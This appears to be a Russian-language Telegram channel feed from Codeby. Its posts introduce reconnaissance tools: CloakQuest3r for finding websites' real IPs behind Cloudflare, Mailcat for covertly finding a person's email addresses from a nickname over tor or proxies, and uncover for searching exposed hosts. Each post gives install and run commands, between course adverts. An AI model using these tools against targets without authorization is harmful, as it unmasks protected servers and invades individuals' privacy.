CloakQuest3r — это мощный инструмент на Python, тщательно разработанный для раскрытия истинного IP-адреса веб-сайтов, защищённых Cloudflare и другими альтернативными сервисами, широко распространённым сервисом веб-безопасности и повышения производительности. Его основная задача — точно определить фактический IP-адрес веб-серверов, скрытых за защитой Cloudflare. Сканирование поддоменов является ключевым методом решения этой задачи. Этот инструмент — бесценный ресурс для тестировщиков на проникновение, специалистов по безопасности и веб-администраторов, стремящихся провести комплексную оценку безопасности и выявить уязвимости, которые могут быть скрыты мерами безопасности Cloudflare.

📕Характеристика:
Обнаружение реального IP-адреса: CloakQuest3r превосходно определяет реальные IP-адреса веб-серверов, использующих сервисы Cloudflare.
Сканирование поддоменов: Сканирование поддоменов является основополагающим компонентом процесса определения реального IP-адреса. Оно помогает определить фактический сервер, ответственный за размещение веб-сайта и связанных с ним поддоменов.
История IP-адресов: Извлекает историческую информацию об IP-адресах для заданного домена.
Анализ SSL-сертификата: Извлекает и анализирует SSL-сертификаты, связанные с целевым доменом.
Поточное сканирование: Для повышения эффективности и ускорения процесса определения реального IP-адреса CloakQuest3r использует многопоточность.

💻Установка:

git clone https://github.com/spyboy-productions/CloakQuest3r.git

cd CloakQuest3r


📌Запуск:
python cloakquest3r.py example.com


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

Mailcat

Mailcat - Найдите существующие адреса электронной почты по нику, используя методы проверки API/SMTP без уведомления пользователя.

📕Характеристики:
Удобный интерфейс
Поддержка tor
Поддержка proxy

💻Установка:

git clone https://github.com/sharsil/mailcat.git

cd mailcat

pip3 install -r requirements.txt --break-system-packages


📌Запуск:
python3 mailcat.py <NICKNAME>

Запуск с tor:
python3 mailcat.py --tor <NICKNAME>

Запуск с proxy:
proxychains4 -q python3 mailcat.py <NICKNAME> 

или
python3 mailcat.py <NICKNAME> --proxy http://127.0.0.1:8080


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…

Codeby

🔔 Python стал универсальным инструментом, который снимает рутину с пентестера и ускоряет работу.

Посмотрим, как это происходит на практике. ⬆️


Готовы использовать Python, чтобы ваш пентест стал быстрее и глубже? Сделайте себе профессиональный подарок. Запись на курс «Python для Пентестера» открыта до 25 декабря.

🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

По всем вопросам пишите
⚡️ @Codeby_Academy
➡️ Все наши каналы 💬Все наши чаты

Читать полностью…

Codeby

🟧 uncover

Инструмент, использующий API известных поисковых систем для быстрого обнаружения открытых хостов в интернете.

Обладает следующими характеристиками

🟧Одновременный запрос к нескольким поисковым системам;
🟧Поддержка доступных поисковых систем: Shodan, Censys, FOFA, Hunter, Quake, ZoomEye, Netlas, CriminalIP, PublicWWW, HunterHow, Google, Onyphe, Driftnet;
🟧Поддерживает ввод нескольких ключей API;
🟧Автоматическая рандомизация ключей API;
🟧Вывод uncover можно перенаправить в другие проекты в рамках рабочего процесса, принимающие stdin в качестве входных данных (например, uncover -q example -f ip | naabu).

Для успешной установки требуется go1.21.

 
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest


Файл конфигурации находится по пути $CONFIG/uncover/provider-config.yaml. Пример данного файла представлен ниже:

Если в файле конфигурации указано несколько ключей/учетных данных для одного и того же провайдера, для каждого выполнения будет использоваться случайный ключ.

🟧Использование
Поддерживает несколько способов выполнения запроса, включая stdin или флаг -q. По умолчанию для поиска используется shodan.
echo 'ssl:"Uber Technologies, Inc."' | uncover


Флаг -e можно использовать для выполнения одного и того же запроса в любой или во всех поисковых системах.
echo jira | uncover -e shodan,censys,fofa,quake,hunter,zoomeye,netlas,criminalip,driftnet


Поддерживает использование driftnet API для быстрого поиска открытых портов по заданному IP-адресу или CIDR-адресу.
echo 8.8.8.8/20 | uncover -e driftnet


Перенаправление вывода uncover в httpx в качестве входных данных.
uncover -q http.title:GitLab -silent | httpx -silent


🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!

➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером

Читать полностью…
Subscribe to a channel